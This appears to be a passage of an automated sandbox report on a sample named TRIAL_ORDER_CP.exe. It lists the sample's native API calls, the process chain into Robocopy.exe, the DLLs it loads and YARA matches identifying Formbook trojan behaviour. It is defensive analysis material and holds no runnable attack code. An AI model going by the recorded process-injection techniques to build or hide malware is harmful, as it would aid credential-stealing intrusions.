        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 5_2_047425F8 SleepEx, NtCreateSection, 5_2_047425F8
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A34E0 NtCreateMutant, LdrInitializeThunk, 6_2_045A34E0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2C30 NtMapViewOfSection, LdrInitializeThunk, 6_2_045A2C30
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2CF0 NtDelayExecution, LdrInitializeThunk, 6_2_045A2CF0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2D10 NtQuerySystemInformation, LdrInitializeThunk, 6_2_045A2D10
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2E50 NtCreateSection, LdrInitializeThunk, 6_2_045A2E50
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2F00 NtCreateFile, LdrInitializeThunk, 6_2_045A2F00
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A29F0 NtReadFile, LdrInitializeThunk, 6_2_045A29F0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2A80 NtClose, LdrInitializeThunk, 6_2_045A2A80
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2B10 NtAllocateVirtualMemory, LdrInitializeThunk, 6_2_045A2B10
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2B00 NtQueryValueKey, LdrInitializeThunk, 6_2_045A2B00
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2BC0 NtQueryInformationToken, LdrInitializeThunk, 6_2_045A2BC0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2B90 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_045A2B90
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2B80 NtCreateKey, LdrInitializeThunk, 6_2_045A2B80
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A4570 NtSuspendThread, 6_2_045A4570
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A4260 NtSetContextThread, 6_2_045A4260
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2C50 NtUnmapViewOfSection, 6_2_045A2C50
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2C10 NtOpenProcess, 6_2_045A2C10
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A3C30 NtOpenProcessToken, 6_2_045A3C30
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2C20 NtSetInformationFile, 6_2_045A2C20
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2CD0 NtEnumerateKey, 6_2_045A2CD0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A3C90 NtOpenThread, 6_2_045A3C90
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2D50 NtWriteVirtualMemory, 6_2_045A2D50
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2DC0 NtAdjustPrivilegesToken, 6_2_045A2DC0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2DA0 NtReadVirtualMemory, 6_2_045A2DA0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2E00 NtQueueApcThread, 6_2_045A2E00
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2ED0 NtResumeThread, 6_2_045A2ED0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2EC0 NtQuerySection, 6_2_045A2EC0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2E80 NtCreateProcessEx, 6_2_045A2E80
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2EB0 NtProtectVirtualMemory, 6_2_045A2EB0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2F30 NtOpenDirectoryObject, 6_2_045A2F30
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2FB0 NtSetValueKey, 6_2_045A2FB0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A38D0 NtGetContextThread, 6_2_045A38D0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A29D0 NtWaitForSingleObject, 6_2_045A29D0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2A10 NtWriteFile, 6_2_045A2A10
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2AC0 NtEnumerateValueKey, 6_2_045A2AC0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2AA0 NtQueryInformationFile, 6_2_045A2AA0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2B20 NtQueryInformationProcess, 6_2_045A2B20
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_045A2BE0 NtQueryVirtualMemory, 6_2_045A2BE0
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_0488EFDA NtQueryInformationProcess, 6_2_0488EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_04893C78 NtResumeThread, 6_2_04893C78
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_04893638 NtSetContextThread, 6_2_04893638
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_04893F98 NtQueueApcThread, 6_2_04893F98
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_0488F99A NtClose, 6_2_0488F99A
        Source: C:\Windows\SysWOW64\Robocopy.exe | Code function: 6_2_04893958 NtSuspendThread, 6_2_04893958
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 0_2_0040352F EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrlenW, wsprintfW, GetFileAttributesW, DeleteFileW, SetCurrentDirectoryW, CopyFileW, OleUninitialize, ExitProcess, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess, 0_2_0040352F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | File created: C:\Windows\resources\0409
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474CFFA5_2_0474CFFA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045704456_2_04570445
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045DD4806_2_045DD480
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463A5266_2_0463A526
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046275C66_2_046275C6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F5C96_2_0462F5C9
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461D6466_2_0461D646
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045946706_2_04594670
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460D62C6_2_0460D62C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458C6006_2_0458C600
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F6F66_2_0462F6F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462A6C06_2_0462A6C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E36EC6_2_045E36EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456C6E06_2_0456C6E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045706806_2_04570680
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046267576_2_04626757
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045727606_2_04572760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457A7606_2_0457A760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461E0766_2_0461E076
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457B0D06_2_0457B0D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046270F16_2_046270F1
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A508C6_2_045A508C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045600A06_2_045600A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B717A6_2_045B717A
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0455F1136_2_0455F113
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460D1306_2_0460D130
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463010E6_2_0463010E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045751C06_2_045751C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458B1E06_2_0458B1E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462124C6_2_0462124C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0455D2EC6_2_0455D2EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457E3106_2_0457E310
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F3306_2_0462F330
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045613806_2_04561380
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EC606_2_0462EC60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04626C696_2_04626C69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461EC4C6_2_0461EC4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04573C606_2_04573C60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04560C126_2_04560C12
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457AC206_2_0457AC20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04588CDF6_2_04588CDF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463ACEB6_2_0463ACEB
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458FCE06_2_0458FCE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04609C986_2_04609C98
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04627D4C6_2_04627D4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04570D696_2_04570D69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FD276_2_0462FD27
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456AD006_2_0456AD00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04579DD06_2_04579DD0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460FDF46_2_0460FDF4
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04582DB06_2_04582DB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04590E506_2_04590E50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04610E6D6_2_04610E6D
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B2E486_2_045B2E48
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04629ED26_2_04629ED2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04562EE86_2_04562EE8
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04620EAD6_2_04620EAD
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04571EB26_2_04571EB2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FF636_2_0462FF63
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457CF006_2_0457CF00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04621FC66_2_04621FC6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04576FE06_2_04576FE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EFBF6_2_0462EFBF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F8726_2_0462F872
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045798706_2_04579870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458B8706_2_0458B870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E58706_2_045E5870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045568686_2_04556868
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0459E8106_2_0459E810
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046108356_2_04610835
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045738006_2_04573800
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046278F36_2_046278F3
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045728C06_2_045728C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046218DA6_2_046218DA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045868826_2_04586882
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E98B26_2_045E98B2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B59C06_2_045B59C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462E9A66_2_0462E9A6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456E9A06_2_0456E9A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EA5B6_2_0462EA5B
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462CA136_2_0462CA13
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FA896_2_0462FA89
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458FAA06_2_0458FAA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045ADB196_2_045ADB19
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04570B106_2_04570B10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FB2E6_2_0462FB2E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E4BC06_2_045E4BC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488EFDA6_2_0488EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E4246_2_0488E424
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E7BC6_2_0488E7BC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488D8286_2_0488D828
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E3056_2_0488E305
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: String function: 33B9EF10 appears 105 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: String function: 33B67BE4 appears 88 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: String function: 33B0B910 appears 266 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: String function: 33B8E692 appears 84 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: String function: 33B55050 appears 36 times
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: String function: 045A5050 appears 36 times
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: String function: 045B7BE4 appears 95 times
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: String function: 0455B910 appears 268 times
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: String function: 045DE692 appears 86 times
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: String function: 045EEF10 appears 105 times
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033DB0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerobocopy.exej% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerobocopy.exej% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.0000000033A59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.000000003389B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.evad.winEXE@5/13@1/1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsp13E5.tmp
        Source: TRIAL_ORDER_CP.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: TRIAL_ORDER_CP.exe ReversingLabs: Detection: 26%
        Source: TRIAL_ORDER_CP.exe Virustotal: Detection: 42%
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File read: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
        Source: unknown Process created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: TRIAL_ORDER_CP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: robocopy.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: TRIAL_ORDER_CP.exe, TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: robocopy.pdbGCTL source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
